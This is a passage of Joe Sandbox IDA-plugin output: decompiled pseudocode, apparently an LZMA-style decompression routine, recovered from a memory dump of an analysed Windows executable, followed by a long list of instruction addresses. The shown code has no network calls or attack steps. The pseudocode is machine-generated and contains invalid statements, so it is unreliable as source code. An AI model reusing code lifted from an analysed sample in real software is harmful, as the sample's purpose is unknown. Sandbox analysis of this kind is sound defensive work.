                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                            											__eflags =  *_t487;
                                            											goto L149;
                                            										case 0x19:
                                            											__eflags = __ebx - 4;
                                            											if(__ebx < 4) {
                                            												 *(__ebp - 0x2c) = __ebx;
                                            												L120:
                                            												_t394 = __ebp - 0x2c;
                                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                                            												__eflags =  *_t394;
                                            												L121:
                                            												__eax =  *(__ebp - 0x2c);
                                            												__eflags = __eax;
                                            												if(__eax == 0) {
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            													goto L170;
                                            												}
                                            												__eflags = __eax -  *(__ebp - 0x60);
                                            												if(__eax >  *(__ebp - 0x60)) {
                                            													goto L171;
                                            												}
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            												__eax =  *(__ebp - 0x30);
                                            												_t401 = __ebp - 0x60;
                                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            												__eflags =  *_t401;
                                            												goto L124;
                                            											}
                                            											__ecx = __ebx;
                                            											__eax = __ebx;
                                            											__ecx = __ebx >> 1;
                                            											__eax = __ebx & 0x00000001;
                                            											__ecx = (__ebx >> 1) - 1;
                                            											__al = __al | 0x00000002;
                                            											__eax = (__ebx & 0x00000001) << __cl;
                                            											__eflags = __ebx - 0xe;
                                            											 *(__ebp - 0x2c) = __eax;
                                            											if(__ebx >= 0xe) {
                                            												__ebx = 0;
                                            												 *(__ebp - 0x48) = __ecx;
                                            												L103:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__eax = __eax + __ebx;
                                            													 *(__ebp - 0x40) = 4;
                                            													 *(__ebp - 0x2c) = __eax;
                                            													__eax =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 4) + 0x644;
                                            													__eflags = __eax;
                                            													L109:
                                            													__ebx = 0;
                                            													 *(__ebp - 0x58) = __eax;
                                            													 *(__ebp - 0x50) = 1;
                                            													 *(__ebp - 0x44) = 0;
                                            													 *(__ebp - 0x48) = 0;
                                            													L113:
                                            													__eax =  *(__ebp - 0x40);
                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            														_t392 = __ebp - 0x2c;
                                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                            														__eflags =  *_t392;
                                            														goto L120;
                                            													}
                                            													__eax =  *(__ebp - 0x50);
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            													__eax =  *(__ebp - 0x58);
                                            													__esi = __edi + __eax;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__ax =  *__esi;
                                            													__ecx = __ax & 0x0000ffff;
                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                            													if( *(__ebp - 0xc) >= __edx) {
                                            														__ecx = 0;
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            														__ecx = 1;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            														__ebx = 1;
                                            														__ecx =  *(__ebp - 0x48);
                                            														__ebx = 1 << __cl;
                                            														__ecx = 1 << __cl;
                                            														__ebx =  *(__ebp - 0x44);
                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                            														__cx = __ax;
                                            														__cx = __ax >> 5;
                                            														__eax = __eax - __ecx;
                                            														__edi = __edi + 1;
                                            														__eflags = __edi;
                                            														 *(__ebp - 0x44) = __ebx;
                                            														 *__esi = __ax;
                                            														 *(__ebp - 0x50) = __edi;
                                            													} else {
                                            														 *(__ebp - 0x10) = __edx;
                                            														0x800 = 0x800 - __ecx;
                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            														 *__esi = __dx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L112:
                                            														_t369 = __ebp - 0x48;
                                            														 *_t369 =  *(__ebp - 0x48) + 1;
                                            														__eflags =  *_t369;
                                            														goto L113;
                                            													} else {
                                            														goto L110;
                                            													}
                                            												}
                                            												__ecx =  *(__ebp - 0xc);
                                            												__ebx = __ebx + __ebx;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            													__ecx =  *(__ebp - 0x10);
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													__ebx = __ebx | 0x00000001;
                                            													__eflags = __ebx;
                                            													 *(__ebp - 0x44) = __ebx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													L102:
                                            													_t339 = __ebp - 0x48;
                                            													 *_t339 =  *(__ebp - 0x48) - 1;
                                            													__eflags =  *_t339;
                                            													goto L103;
                                            												} else {
                                            													goto L100;
                                            												}
                                            											}
                                            											__edx =  *(__ebp - 4);
                                            											__eax = __eax - __ebx;
                                            											 *(__ebp - 0x40) = __ecx;
                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            											goto L109;
                                            										case 0x1a:
                                            											L56:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1a;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x68);
                                            											__al =  *(__ebp - 0x5c);
                                            											__edx =  *(__ebp - 8);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            											 *( *(__ebp - 0x68)) = __al;
                                            											__ecx =  *(__ebp - 0x14);
                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                            											__eax = __ecx + 1;
                                            											__edx = 0;
                                            											_t192 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t192;
                                            											goto L80;
                                            										case 0x1b:
                                            											L76:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1b;
                                            												goto L170;
                                            											}
                                            											__eax =  *(__ebp - 0x14);
                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            											__eflags = __eax -  *(__ebp - 0x74);
                                            											if(__eax >=  *(__ebp - 0x74)) {
                                            												__eax = __eax +  *(__ebp - 0x74);
                                            												__eflags = __eax;
                                            											}
                                            											__edx =  *(__ebp - 8);
                                            											__cl =  *(__eax + __edx);
                                            											__eax =  *(__ebp - 0x14);
                                            											 *(__ebp - 0x5c) = __cl;
                                            											 *(__eax + __edx) = __cl;
                                            											__eax = __eax + 1;
                                            											__edx = 0;
                                            											_t275 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t275;
                                            											__eax =  *(__ebp - 0x68);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											_t284 = __ebp - 0x64;
                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                            											__eflags =  *_t284;
                                            											 *( *(__ebp - 0x68)) = __cl;
                                            											L80:
                                            											 *(__ebp - 0x14) = __edx;
                                            											goto L81;
                                            										case 0x1c:
                                            											while(1) {
                                            												L124:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t415 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t415;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            												__eflags =  *(__ebp - 0x30);
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												 *(__ebp - 0x14) = _t415;
                                            												if( *(__ebp - 0x30) > 0) {
                                            													continue;
                                            												} else {
                                            													L81:
                                            													 *(__ebp - 0x88) = 2;
                                            													goto L1;
                                            												}
                                            											}
                                            											 *(__ebp - 0x88) = 0x1c;
                                            											L170:
                                            											_push(0x22);
                                            											_pop(_t567);
                                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                            											_t535 = 0;
                                            											L172:
                                            											return _t535;
                                            									}
                                            								}
                                            								L171:
                                            								_t535 = _t534 | 0xffffffff;
                                            								goto L172;
                                            							}
                                            						}
                                            						__eax =  *(__ebp - 0x50);
                                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            						__eax =  *(__ebp - 0x58);
                                            						__esi = __edx + __eax;
                                            						 *(__ebp - 0x54) = __esi;
                                            						__ax =  *__esi;
                                            						__edi = __ax & 0x0000ffff;
                                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            						if( *(__ebp - 0xc) >= __ecx) {
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            							__cx = __ax;
                                            							__cx = __ax >> 5;
                                            							__eax = __eax - __ecx;
                                            							__edx = __edx + 1;
                                            							 *__esi = __ax;
                                            							 *(__ebp - 0x50) = __edx;
                                            						} else {
                                            							 *(__ebp - 0x10) = __ecx;
                                            							0x800 = 0x800 - __edi;
                                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            							 *__esi = __cx;
                                            						}
                                            						if( *(__ebp - 0x10) >= 0x1000000) {
                                            							goto L148;
                                            						} else {
                                            							goto L146;
                                            						}
                                            					}
                                            					goto L1;
                                            				}
                                            			}








                                            0x00000000
                                            0x00407395
                                            0x00407395
                                            0x00407399
                                            0x004073be
                                            0x004073c8
                                            0x00000000
                                            0x0040739b
                                            0x0040739b
                                            0x0040739e
                                            0x004073a2
                                            0x004073a5
                                            0x004073a8
                                            0x004073ac
                                            0x004073ac
                                            0x004073af
                                            0x00407489
                                            0x00407489
                                            0x00407490
                                            0x00407490
                                            0x00407493
                                            0x0040749a
                                            0x004074c7
                                            0x004074cb
                                            0x0040752b
                                            0x0040752e
                                            0x00407533
                                            0x00407534
                                            0x00407536
                                            0x00407538
                                            0x0040753b
                                            0x00407447
                                            0x00407447
                                            0x00407447
                                            0x00406be3
                                            0x00406be3
                                            0x00406be3
                                            0x00406bec
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x00000000
                                            0x00406bfd
                                            0x00000000
                                            0x00000000
                                            0x00406c06
                                            0x00406c09
                                            0x00406c0c
                                            0x00406c10
                                            0x00000000
                                            0x00000000
                                            0x00406c16
                                            0x00406c19
                                            0x00406c1b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406c21
                                            0x00406c22
                                            0x00406c24
                                            0x00406c27
                                            0x00406c2c
                                            0x00406c31
                                            0x00406c3a
                                            0x00406c4d
                                            0x00406c50
                                            0x00406c5c
                                            0x00406c84
                                            0x00406c86
                                            0x00406c94
                                            0x00406c94
                                            0x00406c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c88
                                            0x00406c88
                                            0x00406c8b
                                            0x00406c8c
                                            0x00406c8c
                                            0x00000000
                                            0x00406c88
                                            0x00406c62
                                            0x00406c67
                                            0x00406c67
                                            0x00406c70
                                            0x00406c78
                                            0x00406c7b
                                            0x00000000
                                            0x00406c81
                                            0x00406c81
                                            0x00000000
                                            0x00406c81
                                            0x00000000
                                            0x00406c9e
                                            0x00406c9e
                                            0x00406ca2
                                            0x0040754e
                                            0x00000000
                                            0x0040754e
                                            0x00406cab
                                            0x00406cbb
                                            0x00406cbe
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc4
                                            0x00406cc8
                                            0x00000000
                                            0x00000000
                                            0x00406cca
                                            0x00406cd0
                                            0x00406cfa
                                            0x00406d00
                                            0x00406d07
                                            0x00000000
                                            0x00406d07
                                            0x00406cd6
                                            0x00406cd9
                                            0x00406cde
                                            0x00406cde
                                            0x00406ce9
                                            0x00406cf1
                                            0x00406cf4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d39
                                            0x00406d3f
                                            0x00406d42
                                            0x00406d4f
                                            0x00406d57
                                            0x00000000
                                            0x00000000
                                            0x00406d0e
                                            0x00406d0e
                                            0x00406d12
                                            0x0040755d
                                            0x00000000
                                            0x0040755d
                                            0x00406d1e
                                            0x00406d29
                                            0x00406d29
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d32
                                            0x00406d37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040741c
                                            0x00407420
                                            0x004075cf
                                            0x00000000
                                            0x004075cf
                                            0x0040742c
                                            0x00407433
                                            0x0040743b
                                            0x0040743e
                                            0x00407441
                                            0x00407441
                                            0x00000000
                                            0x00000000
                                            0x00406d5f
                                            0x00406d61
                                            0x00406d64
                                            0x00406dd5
                                            0x00406dd8
                                            0x00406ddb
                                            0x00406de2
                                            0x00406dec
                                            0x00000000
                                            0x00406dec
                                            0x00406d66
                                            0x00406d6a
                                            0x00406d6d
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d75
                                            0x00406d77
                                            0x00406d7a
                                            0x00406d7c
                                            0x00406d81
                                            0x00406d84
                                            0x00406d87
                                            0x00406d8b
                                            0x00406d92
                                            0x00406d95
                                            0x00406d9c
                                            0x00406da0
                                            0x00406da8
                                            0x00406da8
                                            0x00406da8
                                            0x00406da2
                                            0x00406da2
                                            0x00406da2
                                            0x00406d97
                                            0x00406d97
                                            0x00406d97
                                            0x00406dac
                                            0x00406daf
                                            0x00406dcd
                                            0x00406dcf
                                            0x00000000
                                            0x00406db1
                                            0x00406db1
                                            0x00406db4
                                            0x00406db7
                                            0x00406dba
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbf
                                            0x00406dc2
                                            0x00406dc4
                                            0x00406dc5
                                            0x00406dc8
                                            0x00000000
                                            0x00406dc8
                                            0x00000000
                                            0x00406ffe
                                            0x00407002
                                            0x00407020
                                            0x00407023
                                            0x0040702a
                                            0x0040702d
                                            0x00407030
                                            0x00407033
                                            0x00407036
                                            0x00407039
                                            0x0040703b
                                            0x00407042
                                            0x00407043
                                            0x00407045
                                            0x00407048
                                            0x0040704b
                                            0x0040704e
                                            0x0040704e
                                            0x00407053
                                            0x00000000
                                            0x00407053
                                            0x00407004
                                            0x00407007
                                            0x0040700a
                                            0x00407014
                                            0x00000000
                                            0x00000000
                                            0x00407068
                                            0x0040706c
                                            0x0040708f
                                            0x00407092
                                            0x00407095
                                            0x0040709f
                                            0x0040706e
                                            0x0040706e
                                            0x00407071
                                            0x00407074
                                            0x00407077
                                            0x00407084
                                            0x00407087
                                            0x00407087
                                            0x00000000
                                            0x00000000
                                            0x004070ab
                                            0x004070af
                                            0x00000000
                                            0x00000000
                                            0x004070b5
                                            0x004070b9
                                            0x00000000
                                            0x00000000
                                            0x004070bf
                                            0x004070c1
                                            0x004070c5
                                            0x004070c5
                                            0x004070c8
                                            0x004070cc
                                            0x00000000
                                            0x00000000
                                            0x0040711c
                                            0x00407120
                                            0x00407127
                                            0x0040712a
                                            0x0040712d
                                            0x00407137
                                            0x00000000
                                            0x00407137
                                            0x00407122
                                            0x00000000
                                            0x00000000
                                            0x00407143
                                            0x00407147
                                            0x0040714e
                                            0x00407151
                                            0x00407154
                                            0x00407149
                                            0x00407149
                                            0x00407149
                                            0x00407157
                                            0x0040715a
                                            0x0040715d
                                            0x0040715d
                                            0x00407160
                                            0x00407163
                                            0x00407166
                                            0x00407166
                                            0x00407169
                                            0x00407170
                                            0x00407175
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407207
                                            0x004075a5
                                            0x00000000
                                            0x004075a5
                                            0x0040720d
                                            0x00407210
                                            0x00407213
                                            0x00407217
                                            0x0040721a
                                            0x00407220
                                            0x00407222
                                            0x00407222
                                            0x00407222
                                            0x00407225
                                            0x00407228
                                            0x00000000
                                            0x00000000
                                            0x00406df8
                                            0x00406df8
                                            0x00406dfc
                                            0x00407569
                                            0x00000000
                                            0x00407569
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0c
                                            0x00406e0f
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e17
                                            0x00406e1a
                                            0x00406e1d
                                            0x00406e1d
                                            0x00406e20
                                            0x00406e23
                                            0x00000000
                                            0x00000000
                                            0x00406e29
                                            0x00406e2f
                                            0x00000000
                                            0x00000000
                                            0x00406e35
                                            0x00406e35
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e3f
                                            0x00406e42
                                            0x00406e45
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e51
                                            0x00406e54
                                            0x00406e57
                                            0x00406e5a
                                            0x00406e5d
                                            0x00406e60
                                            0x00406e63
                                            0x00406e7f
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8f
                                            0x00406e93
                                            0x00406e95
                                            0x00406e99
                                            0x00406e65
                                            0x00406e65
                                            0x00406e69
                                            0x00406e71
                                            0x00406e76
                                            0x00406e78
                                            0x00406e7a
                                            0x00406e7a
                                            0x00406e9c
                                            0x00406ea3
                                            0x00406ea6
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406eb5
                                            0x00407575
                                            0x00000000
                                            0x00407575
                                            0x00406ebb
                                            0x00406ebe
                                            0x00406ec1
                                            0x00406ec5
                                            0x00406ec8
                                            0x00406ece
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed3
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406edc
                                            0x00000000
                                            0x00000000
                                            0x00406ede
                                            0x00406ee1
                                            0x00406ee4
                                            0x00406ee7
                                            0x00406eea
                                            0x00406eed
                                            0x00406ef0
                                            0x00406ef3
                                            0x00406ef6
                                            0x00406ef9
                                            0x00406efc
                                            0x00406f14
                                            0x00406f17
                                            0x00406f1a
                                            0x00406f1d
                                            0x00406f1d
                                            0x00406f20
                                            0x00406f24
                                            0x00406f26
                                            0x00406efe
                                            0x00406efe
                                            0x00406f06
                                            0x00406f0b
                                            0x00406f0d
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f29
                                            0x00406f30
                                            0x00406f33
                                            0x00000000
                                            0x00406f35
                                            0x00000000
                                            0x00406f35
                                            0x00406f33
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00000000
                                            0x00000000
                                            0x00406f75
                                            0x00406f75
                                            0x00406f79
                                            0x00407581
                                            0x00000000
                                            0x00407581
                                            0x00406f7f
                                            0x00406f82
                                            0x00406f85
                                            0x00406f89
                                            0x00406f8c
                                            0x00406f92
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f97
                                            0x00406f9a
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406f3e
                                            0x00406f3e
                                            0x00406f41
                                            0x00000000
                                            0x00406f41
                                            0x00406fa2
                                            0x00406fa2
                                            0x00406fa5
                                            0x00406fa8
                                            0x00406fab
                                            0x00406fae
                                            0x00406fb1
                                            0x00406fb4
                                            0x00406fb7
                                            0x00406fba
                                            0x00406fbd
                                            0x00406fc0
                                            0x00406fd8
                                            0x00406fdb
                                            0x00406fde
                                            0x00406fe1
                                            0x00406fe1
                                            0x00406fe4
                                            0x00406fe8
                                            0x00406fea
                                            0x00406fc2
                                            0x00406fc2
                                            0x00406fca
                                            0x00406fcf
                                            0x00406fd1
                                            0x00406fd3
                                            0x00406fd3
                                            0x00406fed
                                            0x00406ff4
                                            0x00406ff7
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00407286
                                            0x00407286
                                            0x0040728a
                                            0x004075b1
                                            0x00000000
                                            0x004075b1
                                            0x00407290
                                            0x00407293
                                            0x00407296
                                            0x0040729a
                                            0x0040729d
                                            0x004072a3
                                            0x004072a5
                                            0x004072a5
                                            0x004072a5
                                            0x004072a8
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407452
                                            0x00407456
                                            0x00407474
                                            0x00407474
                                            0x00407474
                                            0x0040747b
                                            0x00407482
                                            0x00000000
                                            0x00407482
                                            0x00407458
                                            0x0040745b
                                            0x0040745e
                                            0x00407461
                                            0x00407468
                                            0x00000000
                                            0x00000000
                                            0x00407543
                                            0x00407546
                                            0x00407447
                                            0x00407447
                                            0x00000000
                                            0x00000000
                                            0x0040717d
                                            0x0040717f
                                            0x00407186
                                            0x00407187
                                            0x00407189
                                            0x0040718c
                                            0x00000000
                                            0x00000000
                                            0x00407194
                                            0x00407197
                                            0x0040719a
                                            0x0040719c
                                            0x0040719e
                                            0x0040719e
                                            0x0040719f
                                            0x004071a2
                                            0x004071a9
                                            0x004071ac
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040749f
                                            0x0040749f
                                            0x004074a3
                                            0x004075db
                                            0x00000000
                                            0x004075db
                                            0x004074a9
                                            0x004074ac
                                            0x004074af
                                            0x004074b3
                                            0x004074b6
                                            0x004074bc
                                            0x004074be
                                            0x004074be
                                            0x004074be
                                            0x004074c1
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x00000000
                                            0x00000000
                                            0x004071c2
                                            0x004071c5
                                            0x004071fb
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732e
                                            0x0040732e
                                            0x00407331
                                            0x00407333
                                            0x004075bd
                                            0x00000000
                                            0x004075bd
                                            0x00407339
                                            0x0040733c
                                            0x00000000
                                            0x00000000
                                            0x00407342
                                            0x00407346
                                            0x00407349
                                            0x00407349
                                            0x00407349
                                            0x00000000
                                            0x00407349
                                            0x004071c7
                                            0x004071c9
                                            0x004071cb
                                            0x004071cd
                                            0x004071d0
                                            0x004071d1
                                            0x004071d3
                                            0x004071d5
                                            0x004071d8
                                            0x004071db
                                            0x004071f1
                                            0x004071f6
                                            0x0040722e
                                            0x0040722e
                                            0x00407232
                                            0x0040725e
                                            0x00407260
                                            0x00407267
                                            0x0040726a
                                            0x0040726d
                                            0x0040726d
                                            0x00407272
                                            0x00407272
                                            0x00407274
                                            0x00407277
                                            0x0040727e
                                            0x00407281
                                            0x004072ae
                                            0x004072ae
                                            0x004072b1
                                            0x004072b4
                                            0x00407328
                                            0x00407328
                                            0x00407328
                                            0x00000000
                                            0x00407328
                                            0x004072b6
                                            0x004072bc
                                            0x004072bf
                                            0x004072c2
                                            0x004072c5
                                            0x004072c8
                                            0x004072cb
                                            0x004072ce
                                            0x004072d1
                                            0x004072d4
                                            0x004072d7
                                            0x004072f0
                                            0x004072f2
                                            0x004072f5
                                            0x004072f6
                                            0x004072f9
                                            0x004072fb
                                            0x004072fe
                                            0x00407300
                                            0x00407302
                                            0x00407305
                                            0x00407307
                                            0x0040730a
                                            0x0040730e
                                            0x00407310
                                            0x00407310
                                            0x00407311
                                            0x00407314
                                            0x00407317
                                            0x004072d9
                                            0x004072d9
                                            0x004072e1
                                            0x004072e6
                                            0x004072e8
                                            0x004072eb
                                            0x004072eb
                                            0x0040731a
                                            0x00407321
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x00000000
                                            0x00407323
                                            0x00000000
                                            0x00407323
                                            0x00407321
                                            0x00407234
                                            0x00407237
                                            0x00407239
                                            0x0040723c
                                            0x0040723f
                                            0x00407242
                                            0x00407244
                                            0x00407247
                                            0x0040724a
                                            0x0040724a
                                            0x0040724d
                                            0x0040724d
                                            0x00407250
                                            0x00407257
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x00000000
                                            0x00407259
                                            0x00000000
                                            0x00407259
                                            0x00407257
                                            0x004071dd
                                            0x004071e0
                                            0x004071e2
                                            0x004071e5
                                            0x00000000
                                            0x00000000
                                            0x00406f44
                                            0x00406f44
                                            0x00406f48
                                            0x0040758d
                                            0x00000000
                                            0x0040758d
                                            0x00406f4e
                                            0x00406f51
                                            0x00406f54
                                            0x00406f57
                                            0x00406f5a
                                            0x00406f5d
                                            0x00406f60
                                            0x00406f62
                                            0x00406f65
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6d
                                            0x00406f6d
                                            0x00406f6d
                                            0x00000000
                                            0x00000000
                                            0x004070cf
                                            0x004070cf
                                            0x004070d3
                                            0x00407599
                                            0x00000000
                                            0x00407599
                                            0x004070d9
                                            0x004070dc
                                            0x004070df
                                            0x004070e2
                                            0x004070e4
                                            0x004070e4
                                            0x004070e4
                                            0x004070e7
                                            0x004070ea
                                            0x004070ed
                                            0x004070f0
                                            0x004070f3
                                            0x004070f6
                                            0x004070f7
                                            0x004070f9
                                            0x004070f9
                                            0x004070f9
                                            0x004070fc
                                            0x004070ff
                                            0x00407102
                                            0x00407105
                                            0x00407105
                                            0x00407105
                                            0x00407108
                                            0x0040710a
                                            0x0040710a
                                            0x00000000
                                            0x00000000
                                            0x0040734c
                                            0x0040734c
                                            0x0040734c
                                            0x00407350
                                            0x00000000
                                            0x00000000
                                            0x00407356
                                            0x00407359
                                            0x0040735c
                                            0x0040735f
                                            0x00407361
                                            0x00407361
                                            0x00407361
                                            0x00407364
                                            0x00407367
                                            0x0040736a
                                            0x0040736d
                                            0x00407370
                                            0x00407373
                                            0x00407374
                                            0x00407376
                                            0x00407376
                                            0x00407376
                                            0x00407379
                                            0x0040737c
                                            0x0040737f
                                            0x00407382
                                            0x00407385
                                            0x00407389
                                            0x0040738b
                                            0x0040738e
                                            0x00000000
                                            0x00407390
                                            0x0040710d
                                            0x0040710d
                                            0x00000000
                                            0x0040710d
                                            0x0040738e
                                            0x004075c3
                                            0x004075e5
                                            0x004075eb
                                            0x004075ed
                                            0x004075f4
                                            0x004075f6
                                            0x004075fd
                                            0x00407601
                                            0x00000000
                                            0x00406bf2
                                            0x004075fa
                                            0x004075fa
                                            0x00000000
                                            0x004075fa
                                            0x00407447
                                            0x004074cd
                                            0x004074d3
                                            0x004074d6
                                            0x004074d9
                                            0x004074dc
                                            0x004074df
                                            0x004074e2
                                            0x004074e5
                                            0x004074e8
                                            0x004074ee
                                            0x00407507
                                            0x0040750a
                                            0x0040750d
                                            0x00407510
                                            0x00407514
                                            0x00407516
                                            0x00407517
                                            0x0040751a
                                            0x004074f0
                                            0x004074f0
                                            0x004074f8
                                            0x004074fd
                                            0x004074ff
                                            0x00407502
                                            0x00407502
                                            0x00407524
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x00407526
                                            0x00407524
                                            0x00000000
                                            0x00407399

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
